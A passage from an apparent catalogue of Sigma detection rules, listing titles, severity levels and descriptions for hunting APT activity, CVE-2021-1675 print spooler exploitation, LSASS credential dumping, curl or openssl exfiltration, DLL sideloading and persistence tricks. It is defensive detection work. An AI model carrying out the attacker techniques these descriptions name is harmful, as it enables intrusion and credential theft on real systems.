    Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
  • Lace Tempest Malware Loader Execution - Level: high
    Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
  • Mint Sandstorm - AsperaFaspex Suspicious Process Execution - Level: critical
    Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
  • Mint Sandstorm - Log4J Wstomcat Process Execution - Level: high
    Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
  • Mint Sandstorm - ManageEngine Suspicious Process Execution - Level: critical
    Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
  • Potential APT Mustang Panda Activity Against Australian Gov - Level: high
    Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
  • Okta 2023 Breach Indicator Of Compromise - Level: medium
    Description: Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate username used in your environnement.
  • Onyx Sleet APT File Creation Indicators - Level: high
    Description: Detects file creation activity that is related to Onyx Sleet APT activity
  • PaperCut MF/NG Exploitation Related Indicators - Level: high
    Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
  • PaperCut MF/NG Potential Exploitation - Level: high
    Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
  • Peach Sandstorm APT Process Activity Indicators - Level: high
    Description: Detects process creation activity related to Peach Sandstorm APT
  • Potential Peach Sandstorm APT C2 Communication Activity - Level: medium
    Description: Detects potential C2 communication activity related to Peach Sandstorm APT
  • UNC4841 - Email Exfiltration File Pattern - Level: high
    Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
  • UNC4841 - Barracuda ESG Exploitation Indicators - Level: high
    Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - SSL Certificate Exfiltration Via Openssl - Level: high
    Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget - Level: high
    Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget - Level: high
    Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - Potential SEASPY Execution - Level: critical
    Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation - Level: medium
    Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group - Level: high
    Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity - Level: high
    Description: Detects any creation or modification to a windows domain group with the name "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare - Level: high
    Description: Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
  • Potential KamiKakaBot Activity - Lure Document Execution - Level: medium
    Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation - Level: medium
    Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence - Level: high
    Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
  • Potential Raspberry Robin Aclui Dll SideLoading - Level: high
    Description: Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
  • Potential Raspberry Robin CPL Execution Activity - Level: high
    Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap - Level: low
    Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
  • DPRK Threat Actor - C2 Communication DNS Indicators - Level: high
    Description: Detects DNS queries for C2 domains used by DPRK Threat actors.
detection.threat_hunting 113
Show Rules (113)
  • Potential DLL Injection Via AccCheckConsole - Level: medium
    Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
  • Mail Forwarding/Redirecting Activity In O365 - Level: medium
    Description: Detects email forwarding or redirecting acitivty in O365 Audit logs.
  • Python Path Configuration File Creation - Linux - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Okta Password Health Report Query - Level: low
    Description: Detects all activities against the endpoint "/reports/password-health/*" which should only be accessed via OKTA Admin Console UI. Use this rule to hunt for potential suspicious requests. Correlate this event with "admin console" login and alert on requests without any corresponding admin console login
  • Terminate Linux Process Via Kill - Level: medium
    Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
  • Process Discovery - Level: low
    Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • Python Path Configuration File Creation - MacOS - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Clipboard Data Collection Via Pbpaste - Level: medium
    Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
  • .Class Extension URI Ending Request - Level: medium
    Description: Detects requests to URI ending with the ".class" extension in proxy logs. This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j.
  • Firewall Rule Modified In The Windows Firewall Exception List - Level: low
    Description: Detects when a rule has been modified in the Windows firewall exception list
  • Access To Browser Credential Files By Uncommon Applications - Security - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing This rule requires heavy baselining before usage.
  • Scheduled Task Deletion - Level: low
    Description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
  • Potential Remote WMI ActiveScriptEventConsumers Activity - Level: medium
    Description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
  • CreateRemoteThread API and LoadLibrary - Level: medium
    Description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
  • Remote Thread Creation Via PowerShell - Level: medium
    Description: Detects the creation of a remote thread from a Powershell process to another process
  • Access To Browser Credential Files By Uncommon Applications - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. Could indicate potential attempt of stealing sensitive information.
  • Access To Windows Outlook Mail Files By Uncommon Applications - Level: low
    Description: Detects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
  • Access To Sysvol Policies Share By Uncommon Process - Level: medium
    Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
  • Access To .Reg/.Hive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
  • Unattend.XML File Access Attempt - Level: low
    Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended windows install process.
  • ADS Zone.Identifier Deleted - Level: low
    Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
  • DMP/HDMP File Creation - Level: low
    Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
  • Python Path Configuration File Creation - Windows - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Creation of an Executable by an Executable - Level: low
    Description: Detects the creation of an executable by another executable.
  • VsCode Code Tunnel Execution File Indicator - Level: medium
    Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
  • WebDAV Temporary Local File Creation - Level: medium
    Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
  • Non-DLL Extension File Renamed With DLL Extension - Level: medium
    Description: Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
  • Amsi.DLL Load By Uncommon Process - Level: low
    Description: Detects loading of Amsi.dll by uncommon processes
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process - Level: medium
    Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
  • System Drawing DLL Load - Level: low
    Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
  • Microsoft Excel Add-In Loaded - Level: low
    Description: Detects Microsoft Excel loading an Add-In (.xll) file
  • Microsoft Word Add-In Loaded - Level: low
    Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
  • WMI Module Loaded By Uncommon Process - Level: low
    Description: Detects WMI modules being loaded by an uncommon process
  • Dfsvc.EXE Network Connection To Non-Local IPs - Level: medium
    Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address - Level: medium
    Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
  • HH.EXE Initiated HTTP Network Connection - Level: medium
    Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
  • Msiexec.EXE Initiated Network Connection Over HTTP - Level: low
    Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
  • Network Connection Initiated By PowerShell Process - Level: low
    Description: Detects a network connection that was initiated from a PowerShell process. Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
  • Potentially Suspicious Azure Front Door Connection - Level: medium
    Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
  • Network Connection Initiated From Users\Public Folder - Level: medium
    Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. Use this rule to hunt for potential suspicious or uncommon activity in your environement.
  • PsExec Default Named Pipe - Level: low
    Description: Detects PsExec service default pipe creation
  • Uncommon PowerShell Hosts - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic - Level: low
    Description: Detects powershell execution with that make use of to the bxor (Bitwise XOR). Attackers might use as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet - Level: low
    Description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
  • Compress-Archive Cmdlet Execution - Level: low
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Windows Mail App Mailbox Access Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock - Level: low
    Description: Detects when a powershell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
  • SMB over QUIC Via PowerShell Script - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
  • Potential Registry Reconnaissance Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
  • Use Of Remove-Item to Delete File - ScriptBlock - Level: low
    Description: PowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse"
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet - Level: medium
    Description: Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
  • WinAPI Library Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • WinAPI Function Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • Potential Credential Dumping Attempt Via PowerShell - Level: medium
    Description: Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts
  • Uncommon GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
  • Potential Shellcode Injection - Level: medium
    Description: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
  • Password Protected Compressed File Extraction Via 7Zip - Level: low
    Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
  • Set Files as System Files Using Attrib.EXE - Level: low
    Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
  • CMD Shell Output Redirect - Level: low
    Description: Detects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
  • Potential File Override/Append Via SET Command - Level: low
    Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". The typical use case of the "set /p=" command is to prompt the user for input.
  • Dynamic .NET Compilation Via Csc.EXE - Hunting - Level: medium
    Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
  • File Download Via Curl.EXE - Level: medium
    Description: Detects file download using curl.exe
  • Curl.EXE Execution - Level: low
    Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
  • Potential Data Exfiltration Via Curl.EXE - Level: medium
    Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
  • Diskshadow Child Process Spawned - Level: medium
    Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
  • Curl.EXE Execution With Custom UserAgent - Level: medium
    Description: Detects execution of curl.exe with custom useragent options
  • ClickOnce Deployment Execution - Dfsvc.EXE Child Process - Level: medium
    Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
  • Diskshadow Script Mode Execution - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
  • Potential Proxy Execution Via Explorer.EXE From Shell Process - Level: low
    Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. While this is often a legitimate action, this rule can be use to hunt for anomalies. Muddy Waters threat actor was seeing using this technique.
  • Potential DLL Sideloading Activity Via ExtExport.EXE - Level: medium
    Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags was provided.
  • Potential Password Reconnaissance Via Findstr.EXE - Level: medium
    Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
  • New Self Extracting Package Created Via IExpress.EXE - Level: medium
    Description: Detects the "iexpress.exe" utility creating self-extracting packages. Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
  • Microsoft Workflow Compiler Execution - Level: medium
    Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
  • CodePage Modification Via MODE.COM - Level: low
    Description: Detects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • SMB over QUIC Via Net.EXE - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
  • Suspicious New Instance Of An Office COM Object - Level: medium
    Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
  • Import New Module Via PowerShell CommandLine - Level: low
    Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session
  • Unusually Long PowerShell CommandLine - Level: low
    Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Potentially Suspicious PowerShell Child Processes - Level: medium
    Description: Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly - Level: medium
    Description: Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions - Level: medium
    Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. Hunting Opportunity 1- Weed Out The Noise When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
  • Remote Access Tool - Ammy Admin Agent Execution - Level: medium
    Description: Detects the execution of the Ammy Admin RMM agent for remote management.
  • Remote Access Tool - Cmd.EXE Execution via AnyViewer - Level: medium
    Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
  • Remote Access Tool - ScreenConnect Remote Command Execution - Hunting - Level: medium
    Description: Detects remote binary or command execution via the ScreenConnect Service. Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
  • DLL Call by Ordinal Via Rundll32.EXE - Level: medium
    Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly - Level: medium
    Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
  • Scheduled Task Creation From Potential Suspicious Parent Location - Level: medium
    Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
  • SC.EXE Query Execution - Level: low
    Description: Detects execution of "sc.exe" to query information about registered services on the system
  • Potential CommandLine Obfuscation Using Unicode Characters - Level: medium
    Description: Detects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
  • Potentially Suspicious Compression Tool Parameters - Level: medium
    Description: Detects potentially suspicious command line arguments of common data compression tools
  • Elevated System Shell Spawned - Level: medium
    Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
  • EventLog Query Requests By Builtin Utilities - Level: medium
    Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
  • Potential Suspicious Execution From GUID Like Folder Names - Level: low
    Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
  • Execution From Webserver Root Folder - Level: medium
    Description: Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
  • File or Folder Permissions Modifications - Level: medium
    Description: Detects a file or folder's permissions being modified or tampered with.
  • Manual Execution of Script Inside of a Compressed File - Level: medium
    Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. 1. Compressed file opened using 7zip. 2. Compressed file opened using WinRar. 3. Compressed file opened using native windows File Explorer capabilities. When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
  • Process Terminated Via Taskkill - Level: low
    Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
  • Suspicious Tasklist Discovery Command - Level: informational
    Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • System Information Discovery Via Wmic.EXE - Level: low
    Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions.
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript - Level: medium
    Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
  • Arbitrary Command Execution Using WSL - Level: medium
    Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
  • Cab File Extraction Via Wusa.EXE - Level: medium
    Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Microsoft Office Trusted Location Updated - Level: medium
    Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace - Level: medium
    Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
  • Command Executed Via Run Dialog Box - Registry - Level: low
    Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
  • Service Binary in User Controlled Folder - Level: medium
    Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
  • Shell Context Menu Command Tampering - Level: low
    Description: Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands.
cve.2021_1675 9
Show Rules (9)
  • Possible PrintNightmare Print Driver Install - Level: medium
    Description: Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
  • Potential PrintNightmare Exploitation Attempt - Level: high
    Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
  • Windows Spooler Service Suspicious Binary Load - Level: informational
    Description: Detect DLL Load from Spooler Service backup folder
  • PrinterNightmare Mimikatz Driver Name - Level: critical
    Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
  • Suspicious Printer Driver Empty Manufacturer - Level: high
    Description: Detects a suspicious printer driver installation with an empty Manufacturer value
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
  • Possible CVE-2021-1675 Print Spooler Exploitation - Level: high
    Description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation - Level: critical
    Description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
car.2013_07_002 9
Show Rules (9)
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • RDP Login from Localhost - Level: high
